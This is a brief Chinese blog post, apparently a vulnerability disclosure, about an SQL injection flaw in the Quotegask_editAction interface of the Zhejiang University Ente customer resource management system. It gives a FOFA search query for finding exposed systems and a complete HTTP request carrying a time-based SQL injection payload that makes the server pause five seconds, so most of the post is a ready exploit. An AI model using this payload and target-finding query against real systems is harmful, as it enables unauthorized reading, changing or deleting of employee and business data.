Babing
Published on 2024-08-30 / 4 Visits
0
0

Z1-9浙大恩特-客户资源管理系统-SQL

Z1-9浙大恩特-客户资源管理系统-SQL

漏洞描述:

浙大恩特客户资源管理系统 Quotegask_editAction 接口存在 SQL 注入漏洞,攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。

网站图片:

image-20240624184334273

网络测绘:

fofa语法:

FOFA:body=“script/Ent.base.js”

漏洞复现:

payload:

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1');WAITFOR+DELAY+'0:0:5'--&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

效果图:
延时5秒


Comment